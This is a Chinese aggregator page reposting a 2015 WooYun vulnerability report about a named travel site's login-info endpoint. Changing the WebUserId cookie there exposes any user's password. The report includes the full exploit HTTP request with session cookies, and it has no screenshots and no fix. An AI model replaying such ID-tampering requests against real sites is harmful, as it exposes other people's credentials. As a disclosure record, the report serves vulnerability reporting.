记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

苏州同程六合一系统任意密码查看

2015-03-03 05:40

在/AjaxCall.aspx?action=getLogininfojson 这个文件中,通过修改WebUserId 可以查看任意人的密码(自己需登录)



code 区域
POST /AjaxCall.aspx?action=getLogininfojson&s=0.11141269654035568 HTTP/1.1

Host: www.tycts.com

Proxy-Connection: keep-alive

Content-Length: 0

Accept: */*

Origin: http://www.tycts.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Referer: http://www.tycts.com/MyInfo.aspx?ordertype=info

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: ASP.NET_SessionId=rxzvlbuanibb1255wvkepjal; BIGipServerwww-51zfx-net-pool=218239148.20480.0000; __guid=75721363.1926000193762423300.1421116669916.0813; BRIDGE_R4310444=http://www.17u.net/ruanjian/partner.html; BRIDGE_REFRESH=5000; baidu_qiao_v3_count_4310444=1; WebUserId=4382242; count=55; BRIDGE_NEED=1; BRIDGE_CLOCK=1421120009902; Hm_lvt_2841fed4a68fb526142569e3f9d05648=1421116670; Hm_lpvt_2841fed4a68fb526142569e3f9d05648=1421120020; CNZZDATA1000282837=2109187164-1421116662-http%253A%252F%252Fwww.17u.net%252F%7C1421116662; VERSION=2,0,0,0; BRIDGE_INVITE_0=0; Hm_lvt_3748d7f8030fc02d4fe81c616d50b2da=1421116670; Hm_lpvt_3748d7f8030fc02d4fe81c616d50b2da=1421120021





漏洞证明:

查看自己的

p1.png





p2.png



p3.png



p4.png





修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-092232

阅读:105638 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“苏州同程六合一系统任意密码查看”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云